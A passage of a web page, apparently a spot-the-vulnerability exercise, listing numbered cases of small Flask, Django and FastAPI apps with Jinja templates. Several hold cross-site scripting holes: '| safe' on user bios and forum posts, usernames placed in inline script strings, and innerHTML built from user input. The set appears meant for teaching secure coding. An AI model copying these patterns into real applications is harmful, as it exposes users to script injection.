class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"""</span><span class="s"> CREATE TABLE IF NOT EXISTS reviews ( id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT NOT NULL, review TEXT NOT NULL ) </span><span class="sh">"""</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nf">init_db</span><span class="p">()</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/review</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">submit_review</span><span class="p">():</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">review</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">review</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">INSERT INTO reviews (username, review) VALUES (?, ?)</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">review</span><span class="p">)</span> <span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Review submitted.</span><span class="sh">"</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/reviews</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">view_reviews</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">rows</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT username, review FROM reviews</span><span class="sh">"</span><span class="p">).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">reviews.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">reviews</span><span class="o">=</span><span class="n">rows</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- reviews.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">highlightUser</span><span class="p">(</span><span class="nx">username</span><span class="p">)</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">welcome</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Welcome back, </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">username</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">!</span><span class="dl">"</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"welcome"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;h1&gt;</span>Product Reviews<span class="nt">&lt;/h1&gt;</span> {% for review in reviews %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"review"</span><span class="nt">&gt;</span> <span class="nt">&lt;strong&gt;</span>{{ review.username }}<span class="nt">&lt;/strong&gt;</span> <span class="nt">&lt;p&gt;</span>{{ review.review }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;script&gt;</span><span class="nf">highlightUser</span><span class="p">(</span><span class="dl">"</span><span class="s2">{{ review.username }}</span><span class="dl">"</span><span class="p">);</span><span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/div&gt;</span> {% endfor %} <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 41 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="k">def</span> <span class="nf">get_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">users.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="n">row_factory</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Row</span> <span class="k">return</span> <span class="n">conn</span> <span class="k">def</span> <span class="nf">profile</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">username</span><span class="p">):</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">row</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">SELECT username, bio FROM users WHERE username = ?</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">username</span><span class="p">,)</span> <span class="p">).</span><span class="nf">fetchone</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">profile.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">user</span><span class="sh">"</span><span class="p">:</span> <span class="n">row</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- profile.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>{{ user.username }}'s Profile<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"bio"</span><span class="nt">&gt;</span>{{ user.bio | safe }}<span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 42 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="kn">from</span> <span class="n">markupsafe</span> <span class="kn">import</span> <span class="n">escape</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">events.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="n">row_factory</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Row</span> <span class="k">return</span> <span class="n">conn</span> <span class="k">def</span> <span class="nf">init_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"""</span><span class="s"> CREATE TABLE IF NOT EXISTS events ( id INTEGER PRIMARY KEY AUTOINCREMENT, title TEXT NOT NULL, description TEXT NOT NULL ) </span><span class="sh">"""</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nf">init_db</span><span class="p">()</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/event</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">add_event</span><span class="p">():</span> <span class="n">title</span> <span class="o">=</span> <span class="nf">escape</span><span class="p">(</span><span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">title</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">))</span> <span class="n">description</span> <span class="o">=</span> <span class="nf">escape</span><span class="p">(</span><span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">description</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">))</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">INSERT INTO events (title, description) VALUES (?, ?)</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="nf">str</span><span class="p">(</span><span class="n">title</span><span class="p">),</span> <span class="nf">str</span><span class="p">(</span><span class="n">description</span><span class="p">))</span> <span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Event added.</span><span class="sh">"</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/events</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">view_events</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">events</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT title, description FROM events</span><span class="sh">"</span><span class="p">).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">events.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">events</span><span class="o">=</span><span class="n">events</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- events.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Upcoming Events<span class="nt">&lt;/h1&gt;</span> {% for event in events %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"event"</span><span class="nt">&gt;</span> <span class="nt">&lt;h2&gt;</span>{{ event.title }}<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;p&gt;</span>{{ event.description }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> {% endfor %} <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 43 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="k">def</span> <span class="nf">get_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">forum.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="n">row_factory</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Row</span> <span class="k">return</span> <span class="n">conn</span> <span class="k">def</span> <span class="nf">forum</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">:</span> <span class="n">author</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">POST</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">author</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">body</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">POST</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">INSERT INTO posts (author, body) VALUES (?, ?)</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">author</span><span class="p">,</span> <span class="n">body</span><span class="p">)</span> <span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">posts</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT author, body FROM posts</span><span class="sh">"</span><span class="p">).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">forum.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">posts</span><span class="sh">"</span><span class="p">:</span> <span class="n">posts</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- forum.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Forum<span class="nt">&lt;/h1&gt;</span> {% for post in posts %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"post"</span><span class="nt">&gt;</span> <span class="nt">&lt;strong&gt;</span>{{ post.author }}<span class="nt">&lt;/strong&gt;</span> <span class="nt">&lt;p&gt;</span>{{ post.body | safe }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> {% endfor %} <span class="nt">&lt;form</span> <span class="na">method=</span><span class="s">"POST"</span><span class="nt">&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"author"</span> <span class="na">placeholder=</span><span class="s">"Your name"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;textarea</span> <span class="na">name=</span><span class="s">"body"</span> <span class="na">placeholder=</span><span class="s">"Write your post..."</span><span class="nt">&gt;&lt;/textarea&gt;</span> <span class="nt">&lt;button</span> <span class="na">type=</span><span class="s">"submit"</span><span class="nt">&gt;</span>Post<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;/form&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 44 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">blog.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="n">row_factory</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Row</span> <span class="k">return</span> <span class="n">conn</span> <span class="k">def</span> <span class="nf">init_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"""</span><span class="s"> CREATE TABLE IF NOT EXISTS comments ( id INTEGER PRIMARY KEY AUTOINCREMENT, author TEXT NOT NULL, body TEXT NOT NULL ) </span><span class="sh">"""</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nf">init_db</span><span class="p">()</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/comment</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">add_comment</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="n">data</span> <span class="o">=</span> <span class="k">await</span> <span class="n">request</span><span class="p">.</span><span class="nf">json</span><span class="p">()</span> <span class="n">author</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">author</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">body</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">INSERT INTO comments (author, body) VALUES (?, ?)</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">author</span><span class="p">,</span> <span class="n">body</span><span class="p">)</span> <span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">saved</span><span class="sh">"</span><span class="p">}</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/comments</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">view_comments</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">comments</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT author, body FROM comments</span><span class="sh">"</span><span class="p">).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="n">templates</span><span class="p">.</span><span class="nc">TemplateResponse</span><span class="p">(</span><span class="sh">"</span><span class="s">comments.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">request</span><span class="sh">"</span><span class="p">:</span> <span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">comments</span><span class="sh">"</span><span class="p">:</span> <span class="n">comments</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- comments.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">renderComment</span><span class="p">(</span><span class="nx">author</span><span class="p">,</span> <span class="nx">body</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">div</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">"</span><span class="s2">div</span><span class="dl">"</span><span class="p">);</span> <span class="nx">div</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">&lt;strong&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">author</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/strong&gt;&lt;p&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">body</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/p&gt;</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">comments</span><span class="dl">"</span><span class="p">).</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">div</span><span class="p">);</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Blog Comments<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"comments"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="p">{</span><span class="o">%</span> <span class="k">for</span> <span class="nx">comment</span> <span class="k">in</span> <span class="nx">comments</span> <span class="o">%</span><span class="p">}</span> <span class="nf">renderComment</span><span class="p">({{</span> <span class="nx">comment</span><span class="p">.</span><span class="nx">author</span> <span class="o">|</span> <span class="nx">tojson</span> <span class="p">}},</span> <span class="p">{{</span> <span class="nx">comment</span><span class="p">.</span><span class="nx">body</span> <span class="o">|</span> <span class="nx">tojson</span> <span class="p">}});</span> <span class="p">{</span><span class="o">%</span> <span class="nx">endfor</span> <span class="o">%</span><span class="p">}</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 45 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/dashboard</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">dashboard</span><span class="p">():</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">user</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">role</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">role</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">viewer</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">dashboard.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">username</span><span class="o">=</span><span class="n">username</span><span class="p">,</span> <span class="n">role</span><span class="o">=</span><span class="n">role</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- dashboard.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">initDashboard</span><span class="p">(</span><span class="nx">username</span><span class="p">,</span> <span class="nx">role</span><span class="p">)</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">greeting</span><span class="dl">"</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Welcome, </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">username</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">!</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">role-badge</span><span class="dl">"</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">role</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"greeting"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"role-badge"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="nf">initDashboard</span><span class="p">(</span><span class="dl">"</span><span class="s2">{{ username }}</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">{{ role }}</span><span class="dl">"</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 46 </h3> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Live Chat<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"chat-window"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">id=</span><span class="s">"message-input"</span> <span class="na">placeholder=</span><span class="s">"Type a message..."</span> <span class="nt">/&gt;</span> <span class="nt">&lt;button</span> <span class="na">id=</span><span class="s">"send-btn"</span><span class="nt">&gt;</span>Send<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">const</span> <span class="nx">chatWindow</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">chat-window</span><span class="dl">"</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">input</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">message-input</span><span class="dl">"</span><span class="p">);</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">send-btn</span><span class="dl">"</span><span class="p">).</span><span class="nf">addEventListener</span><span class="p">(</span><span class="dl">"</span><span class="s2">click</span><span class="dl">"</span><span class="p">,</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">message</span> <span class="o">=</span> <span class="nx">input</span><span class="p">.</span><span class="nx">value</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">encoded</span> <span class="o">=</span> <span class="nf">encodeURIComponent</span><span class="p">(</span><span class="nx">message</span><span class="p">);</span> <span class="nf">fetch</span><span class="p">(</span><span class="s2">`/send?msg=</span><span class="p">${</span><span class="nx">encoded</span><span class="p">}</span><span class="s2">`</span><span class="p">)</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">res</span> <span class="o">=&gt;</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">())</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">data</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">data</span><span class="p">.</span><span class="nx">messages</span><span class="p">.</span><span class="nf">forEach</span><span class="p">(</span><span class="nx">msg</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">div</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">"</span><span class="s2">div</span><span class="dl">"</span><span class="p">);</span> <span class="nx">div</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">msg</span><span class="p">.</span><span class="nx">author</span> <span class="o">+</span> <span 